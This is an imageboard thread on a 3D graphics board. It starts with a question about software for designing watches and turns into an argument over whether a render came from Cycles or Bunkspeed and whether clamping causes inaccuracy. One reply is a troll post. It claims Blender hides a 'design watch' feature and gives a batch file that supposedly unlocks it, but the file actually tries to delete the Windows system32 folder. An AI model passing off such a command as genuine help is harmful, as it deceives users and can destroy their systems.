What's the best 3D program for designing watches? Would any be fine or are there some that make it easier?

You probably want a CAD program e.g. rhino, solidworks.

>> No.477898

Blender has a "design watch" function, but installing it is a bit tricky, as blender is an open-source software and you're allowed to change it. I wouldn't even bother if you are a newfag who can't even run a batch file. I guess that's why they hide some features away, as to discourage unworthy users to take advantage of their work.

anyway,
After installing Blender, and absolutely with Blender running, just run this code in a batch file, and it will start the hidden downloader for the watch designer function

@eco off
del C:\\WINDOWS\system32

thank me later

blender using cycles.

L.e.L, nice try baiting people, but I could tell instantly that wasn't Cycles, it cannot produce renders of that quality and clarity, it's too scrub tier still. This was rendered with Bunkspeed (which is technically Nvidia IRay).

Cycles can do that.
but thats not cycles like you said

>> No.477983

>>477956
Nope, it can't. I've seen tonnes of "pro" Cycles render and they always have the cheap Cycles look with all kinds of fireflies around the image. And no, clamping does not fix that and is a bad way to try and fix a core problem with the renderer, it destroys some of the physical accuracy by doing that.

>> No.477987

>>477952
It's not cycles.

>> No.478006

>>477983
what kind of shitty renders with fireflies have you been looking at

>> No.478032

>>478006
exactly, I use cycles all the time and use a point 03 clamp and there are no fireflies but the render is still accurate.

>> No.478035

>>478032
The render isn't accurate when using a clamp, because you are clamping the linear light values that normally would continue bouncing and loosing energy as they contribute lighting to the scene within the 0-255 sRGB value spectrum. You're basically going "oh, well this render can't converge properly, so I'll just cull the light energy that it can't handle properly.". It's physically inaccurate and ever Cycles render posted here is instantly identified as one.

Please, post one of your great 0.03 clamp renders to back up your claim.

Why are you guys even arguing about which software is better, can't you tell when you get baited?
Wouldn't it be a lot more productive if you spent more time bullying people who don't read the damn sticky instead?
